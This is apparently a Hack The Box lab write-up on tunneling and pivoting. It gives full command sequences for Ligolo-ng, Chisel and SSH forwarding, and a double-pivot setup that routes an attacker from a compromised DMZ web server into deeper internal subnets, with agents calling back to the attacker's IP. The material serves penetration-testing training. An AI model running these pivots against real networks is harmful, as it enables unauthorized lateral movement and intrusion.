htb-writeups

Tunneling & Pivoting - Practical Scenario

🎯 Scenario: Internal Network Access

Network Layout

Attacker Machine:   10.10.15.10    (Your Kali Linux)
                    │
                    ↓
Web Server:         172.16.1.10    (Compromised - DMZ)
                    │
                    ↓  
Internal Target:    192.168.1.50   (Can't reach directly)

The Problem

You compromised the web server (172.16.1.10), but you need to access the internal database server (192.168.1.50) which:

• Has no internet access
• Only accepts connections from the web server (172.16.1.10)
• Runs SSH on port 22 and a web app on port 8080

---

🛠️ Solution 1: Ligolo-ng (VPN Style)

On Your Machine (10.10.15.10):

./ligolo-ng -self-cert -addr 0.0.0.0:443

On Web Server (172.16.1.10):

./ligolo-ng_agent -connect 10.10.15.10:443 -ignore-cert

Back on Your Machine:

# In Ligolo interface: select session and type 'start'

# Add route to internal network
sudo ip route add 192.168.1.0/24 dev ligolo

# Now access directly like you're on the internal network
ssh user@192.168.1.50
nmap -sV 192.168.1.50
curl http://192.168.1.50:8080

When to use: Need full network access, multiple hosts, running various tools directly.

---

🛠️ Solution 2: Chisel SOCKS Proxy

On Your Machine (10.10.15.10):

./chisel server -p 8080 --reverse

On Web Server (172.16.1.10):

./chisel client 10.10.15.10:8080 R:socks

Usage:

# Edit /etc/proxychains.conf: add 'socks4 127.0.0.1 1080'
proxychains nmap -sT 192.168.1.50
proxychains firefox http://192.168.1.50:8080

When to use: Quick SOCKS proxy for tools that support proxies (Burp, nmap, browsers).

---

🛠️ Solution 3: Chisel Port Forwarding

Forward Specific Service:

# On web server - makes internal 8080 available on your port 9000
./chisel client 10.10.15.10:8080 R:9000:192.168.1.50:8080

Access from your machine:

# Now visit this on YOUR machine
firefox http://127.0.0.1:9000

When to use: Only need one specific service/port from the internal host.

---

🛠️ Solution 4: SSH Tunneling

Local Port Forward (if you have SSH access to web server):

# On your machine
ssh -L 9000:192.168.1.50:80 user@172.16.1.10

# Access internal web via your localhost:9000
firefox http://127.0.0.1:9000

SSH Dynamic SOCKS:

# On your machine
ssh -D 1080 user@172.16.1.10

# Use with proxychains (same as Chisel SOCKS)
proxychains nmap 192.168.1.50

When to use: SSH access available, want “living off the land” approach.

---

🎯 Quick Decision Guide

“I need to scan the entire 192.168.1.0/24 network”

# Use Ligolo-ng (direct access) or Chisel SOCKS
./ligolo-ng   # then: nmap 192.168.1.0/24
# OR
./chisel      # then: proxychains nmap 192.168.1.0/24

“I just need to access the web app on 192.168.1.50:8080”

# Use Chisel port forwarding
./chisel client YOUR_IP:8080 R:9000:192.168.1.50:8080
firefox http://127.0.0.1:9000

“I have SSH credentials on the web server”

# Use SSH tunneling
ssh -D 1080 user@172.16.1.10
proxychains firefox http://192.168.1.50:8080

---

⚡ Pro Tips for This Scenario

1. Ligolo-ng: Remember the route command ip route add 192.168.1.0/24 dev ligolo
2. Chisel: Check /etc/proxychains.conf has the correct SOCKS port

Chisel creates a SOCKS proxy on port 1080 on your local machine. You must edit /etc/proxychains.conf and change the port to 1080 instead of the default 9050. Then use proxychains before any command to route traffic through the tunnel.

Config line: socks4 127.0.0.1 1080

Usage: proxychains nmap target_ip

1. SSH: Use -f -N to run in background: ssh -f -N -D 1080 user@host

Test Connection:

# After any method, test with:
ping 192.168.1.50          # Ligolo-ng only
proxychains curl http://192.168.1.50:8080  # Chisel/SSH SOCKS
curl http://127.0.0.1:9000 # Port forwarding

Choose based on your needs: Full network access → Ligolo-ng, Quick proxy → Chisel, Stealth → SSH.

🎯 Extended Scenario: Multi-Layer Internal Network

Complex Network Layout

Attacker Machine:   10.10.15.10    (Your Kali Linux)
                    │
                    ↓
Web Server:         172.16.1.10    (Compromised - DMZ)
                    │
                    ↓  
Internal Network 1: 192.168.1.0/24 (Database Server: 192.168.1.50)
                    │
                    ↓
Internal Network 2: 10.1.1.0/24    (Deep Internal: 10.1.1.100)

The Challenge

You compromised the web server (172.16.1.10), but need to reach:

• Database server: 192.168.1.50 (SSH:22, Web:8080)
• Deep internal host: 10.1.1.100 (only reachable from 192.168.1.50)
• Multiple services across different subnets

---

🛠️ Solution 1: Ligolo-ng (Advanced VPN Style)

Initial Setup

On Your Machine (10.10.15.10):

# Download from: https://github.com/nicocha30/ligolo-ng
./ligolo-ng -self-cert -addr 0.0.0.0:443

On Web Server (172.16.1.10):

# Upload ligolo-ng agent to compromised server
./ligolo-ng_agent -connect 10.10.15.10:443 -ignore-cert

Basic Pivoting Setup

Back on Your Machine (Ligolo Interface):

# List available sessions
session
# Select the web server session
session 1
# Start the tunnel
start

# Add route to first internal network
sudo ip route add 192.168.1.0/24 dev ligolo

# Test connectivity
ping 192.168.1.50
nmap -sS 192.168.1.50

🎯 Advanced: Double Pivoting with Ligolo-ng

Step 1: Compromise Second Host

# From your machine, through ligolo tunnel
ssh user@192.168.1.50

# Upload ligolo agent to the second pivot (192.168.1.50)
scp ligolo-ng_agent user@192.168.1.50:/tmp/

Step 2: Create Listener for Second Pivot

On Your Ligolo Interface:

# Create listener for second agent
listener_add --addr 0.0.0.0:4443

# Check listeners
listener_list

Step 3: Connect Second Agent

On Second Pivot (192.168.1.50):

# Connect to your new listener
./ligolo-ng_agent -connect 10.10.15.10:4443 -ignore-cert

Step 4: Configure Double Pivot

Back on Your Ligolo Interface:

# List all sessions
session
# You should see both:
# Session 1: Web Server (172.16.1.10)
# Session 2: Internal Host (192.168.1.50)

# Select second session
session 2
start

# Add route to deepest network
sudo ip route add 10.1.1.0/24 dev ligolo

# Now you can access all networks directly!
nmap -sS 10.1.1.100
ssh admin@10.1.1.100

Ligolo-ng Advanced Commands

# In Ligolo interface:
session          # List all sessions
session <id>     # Select session
info             # Show session details
stop             # Stop current tunnel
ifconfig         # Show interface info
listener_list    # Show all listeners
listener_stop <id>  # Stop listener

# Network configuration
sudo ip route del 192.168.1.0/24 dev ligolo  # Remove route
sudo ip route show | grep ligolo             # Show ligolo routes